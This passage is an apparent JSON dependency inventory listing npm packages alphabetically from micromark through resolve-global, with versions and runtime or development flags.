id":14013862804,"package_name":"micromark-factory-label@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862805,"package_name":"micromark-factory-space@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862806,"package_name":"micromark-factory-title@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862807,"package_name":"micromark-factory-whitespace@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862808,"package_name":"micromark-util-character@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862809,"package_name":"micromark-util-chunked@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862810,"package_name":"micromark-util-classify-character@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862811,"package_name":"micromark-util-combine-extensions@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862812,"package_name":"micromark-util-decode-numeric-character-reference@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862813,"package_name":"micromark-util-decode-string@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862814,"package_name":"micromark-util-encode@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862815,"package_name":"micromark-util-html-tag-name@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862816,"package_name":"micromark-util-normalize-identifier@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862817,"package_name":"micromark-util-resolve-all@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862818,"package_name":"micromark-util-sanitize-uri@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862819,"package_name":"micromark-util-subtokenize@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862820,"package_name":"micromark-util-symbol@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862821,"package_name":"micromark-util-types@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862822,"package_name":"micromark@2.11.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862823,"package_name":"micromark@3.0.10","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862824,"package_name":"micromatch@4.0.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862825,"package_name":"mime-db@1.52.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862826,"package_name":"mime-types@2.1.35","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862827,"package_name":"mime@1.6.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862828,"package_name":"mimic-fn@2.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862829,"package_name":"mimic-fn@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862830,"package_name":"mimic-response@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862831,"package_name":"mimic-response@3.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862832,"package_name":"min-indent@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862833,"package_name":"minimalistic-assert@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862834,"package_name":"minimatch@3.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862835,"package_name":"minimatch@5.1.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862836,"package_name":"minimatch@9.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862837,"package_name":"minimatch@9.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862838,"package_name":"minimist-options@4.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862839,"package_name":"minimist@1.2.8","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862840,"package_name":"minipass@5.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862841,"package_name":"minisearch@6.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862843,"package_name":"minisearch@6.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862846,"package_name":"mkdirp@0.5.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862847,"package_name":"mkdirp@1.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862848,"package_name":"mlly@1.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862849,"package_name":"mri@1.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862850,"package_name":"mrmime@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862851,"package_name":"ms@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862852,"package_name":"ms@2.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862853,"package_name":"ms@2.1.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862854,"package_name":"multicast-dns@7.2.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862855,"package_name":"mz@2.7.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862856,"package_name":"nanoid@3.3.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862857,"package_name":"natural-compare-lite@1.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862858,"package_name":"natural-compare@1.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862859,"package_name":"negotiator@0.6.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862860,"package_name":"neo-async@2.6.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862861,"package_name":"nested-error-stacks@2.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862862,"package_name":"next-tick@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862863,"package_name":"nice-try@1.0.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862864,"package_name":"node-cleanup@2.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862865,"package_name":"node-domexception@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862866,"package_name":"node-fetch-native@1.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862867,"package_name":"node-fetch@2.6.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862868,"package_name":"node-fetch@2.6.9(encoding@0.1.13)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862872,"package_name":"node-fetch@3.3.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862873,"package_name":"node-forge@1.3.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862874,"package_name":"node-int64@0.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862875,"package_name":"node-preload@0.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862876,"package_name":"node-releases@2.0.10","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862877,"package_name":"nomnom@1.5.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862881,"package_name":"non-layered-tidy-tree-layout@2.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862882,"package_name":"normalize-package-data@2.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862883,"package_name":"normalize-package-data@3.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862884,"package_name":"normalize-path@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862885,"package_name":"normalize-url@6.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862886,"package_name":"npm-run-path@2.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862887,"package_name":"npm-run-path@4.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862888,"package_name":"npm-run-path@5.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862889,"package_name":"nwsapi@2.2.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862924,"package_name":"nyc@15.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862925,"package_name":"object-assign@4.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862926,"package_name":"object-hash@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862927,"package_name":"object-inspect@1.12.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862928,"package_name":"object-inspect@1.12.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862929,"package_name":"object-keys@1.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862930,"package_name":"object.assign@4.1.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862931,"package_name":"obuf@1.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862932,"package_name":"ofetch@1.3.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862933,"package_name":"on-exit-leak-free@2.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862934,"package_name":"on-finished@2.4.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862935,"package_name":"on-headers@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862936,"package_name":"once@1.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013862937,"package_name":"onetime@5.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862938,"package_name":"onetime@6.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862939,"package_name":"open@8.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862940,"package_name":"optionator@0.8.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862941,"package_name":"optionator@0.9.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862942,"package_name":"ospath@1.2.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862943,"package_name":"p-cancelable@2.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862944,"package_name":"p-event@4.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862945,"package_name":"p-filter@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862946,"package_name":"p-finally@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862947,"package_name":"p-iteration@1.1.8","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862996,"package_name":"p-limit@2.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862997,"package_name":"p-limit@3.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862998,"package_name":"p-limit@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013862999,"package_name":"p-locate@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863000,"package_name":"p-locate@4.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863001,"package_name":"p-locate@5.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863002,"package_name":"p-map@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863003,"package_name":"p-map@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863004,"package_name":"p-map@5.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863005,"package_name":"p-retry@4.6.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863006,"package_name":"p-timeout@3.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863007,"package_name":"p-try@2.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863008,"package_name":"package-hash@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863009,"package_name":"pako@1.0.11","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863010,"package_name":"parent-module@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863011,"package_name":"parent-module@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863012,"package_name":"parse-entities@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863013,"package_name":"parse-json@5.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863014,"package_name":"parse5@6.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863015,"package_name":"parse5@7.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863016,"package_name":"parse5@7.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863017,"package_name":"parseurl@1.3.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863018,"package_name":"path-browserify@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863019,"package_name":"path-exists@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863020,"package_name":"path-exists@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863021,"package_name":"path-is-absolute@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013863022,"package_name":"path-key@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863023,"package_name":"path-key@3.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863024,"package_name":"path-key@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863025,"package_name":"path-parse@1.0.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013863026,"package_name":"path-scurry@1.7.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863028,"package_name":"path-to-regexp@0.1.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863029,"package_name":"path-type@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863030,"package_name":"pathe@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863031,"package_name":"pathe@1.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863032,"package_name":"pathval@1.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863033,"package_name":"pause-stream@0.0.11","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863034,"package_name":"pend@1.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863035,"package_name":"perfect-debounce@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863036,"package_name":"performance-now@2.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863037,"package_name":"phin@3.7.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863038,"package_name":"picocolors@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013863039,"package_name":"picomatch@2.3.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013863040,"package_name":"pidtree@0.6.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863041,"package_name":"pify@2.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013863042,"package_name":"pino-abstract-transport@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013863043,"package_name":"pino-std-serializers@3.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863125,"package_name":"pino-std-serializers@6.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013863233,"package_name":"pino@6.14.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863395,"package_name":"pino@8.14.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013863396,"package_name":"pirates@4.0.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013863397,"package_name":"pixelmatch@5.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863410,"package_name":"pkg-dir@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863411,"package_name":"pkg-dir@4.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863412,"package_name":"pkg-types@1.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863413,"package_name":"plist@3.0.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863414,"package_name":"pluralize@8.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863415,"package_name":"png-async@0.9.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863418,"package_name":"pngjs@3.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863419,"package_name":"pngjs@6.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863557,"package_name":"pnpm@8.6.8","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863558,"package_name":"polka@0.5.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863559,"package_name":"postcss-import@15.1.0(postcss@8.4.27)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013863560,"package_name":"postcss-js@4.0.1(postcss@8.4.27)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013863561,"package_name":"postcss-load-config@4.0.1(postcss@8.4.27)(ts-node@10.9.1)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013863598,"package_name":"postcss-nested@6.0.1(postcss@8.4.27)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013863599,"package_name":"postcss-selector-parser@6.0.13","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013863600,"package_name":"postcss-value-parser@4.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013863601,"package_name":"postcss@8.4.27","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013863602,"package_name":"preact@10.11.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863603,"package_name":"prelude-ls@1.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863604,"package_name":"prelude-ls@1.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863605,"package_name":"prettier-plugin-jsdoc@0.4.2(prettier@2.8.8)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863657,"package_name":"prettier@2.8.8","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863658,"package_name":"pretty-bytes@5.6.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863659,"package_name":"pretty-bytes@6.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863660,"package_name":"pretty-format@29.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863661,"package_name":"process-nextick-args@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863662,"package_name":"process-on-spawn@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863663,"package_name":"process-warning@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863664,"package_name":"process-warning@2.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013863665,"package_name":"process@0.11.10","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013863666,"package_name":"prompts@2.4.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863667,"package_name":"proxy-addr@2.0.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863668,"package_name":"proxy-from-env@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863669,"package_name":"ps-tree@1.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863670,"package_name":"psl@1.9.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863671,"package_name":"pump@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863672,"package_name":"punycode@2.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863673,"package_name":"pure-rand@6.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863674,"package_name":"q@1.5.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863675,"package_name":"qs@6.11.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863676,"package_name":"qs@6.5.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863677,"package_name":"querystringify@2.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863678,"package_name":"queue-microtask@1.2.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013863679,"package_name":"quick-format-unescaped@4.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013863680,"package_name":"quick-lru@4.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863681,"package_name":"quick-lru@5.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863682,"package_name":"ramda@0.28.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013863706,"package_name":"randombytes@2.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863707,"package_name":"range-parser@1.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863708,"package_name":"raw-body@2.5.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863709,"package_name":"react-is@18.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863710,"package_name":"read-cache@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013863711,"package_name":"read-pkg-up@7.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863712,"package_name":"read-pkg-up@8.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863713,"package_name":"read-pkg@5.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863714,"package_name":"read-pkg@6.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863715,"package_name":"readable-stream@2.3.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863716,"package_name":"readable-stream@3.6.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863717,"package_name":"readable-stream@4.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013863734,"package_name":"readdirp@3.6.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013863735,"package_name":"real-require@0.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013863736,"package_name":"rechoir@0.7.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863737,"package_name":"redent@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863738,"package_name":"redent@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863739,"package_name":"regenerate-unicode-properties@10.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863740,"package_name":"regenerate@1.4.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863741,"package_name":"regenerator-runtime@0.13.11","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863742,"package_name":"regenerator-transform@0.15.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863743,"package_name":"regexp-tree@0.1.24","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863759,"package_name":"regexp.prototype.flags@1.4.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863760,"package_name":"regexpu-core@5.3.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863785,"package_name":"regjsparser@0.10.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863786,"package_name":"regjsparser@0.9.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863787,"package_name":"release-zalgo@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863788,"package_name":"remark-frontmatter@4.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863789,"package_name":"remark-gfm@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863790,"package_name":"remark-parse@10.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863791,"package_name":"remark-stringify@10.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863792,"package_name":"remark@14.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863793,"package_name":"repeat-string@1.6.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863794,"package_name":"request-progress@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863801,"package_name":"require-directory@2.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863802,"package_name":"require-from-string@2.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863803,"package_name":"require-main-filename@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863804,"package_name":"requires-port@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863805,"package_name":"resolve-alpn@1.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863806,"package_name":"resolve-cwd@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863807,"package_name":"resolve-from@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863808,"package_name":"resolve-from@5.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013863809,"package_name":"resolve-global@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"ki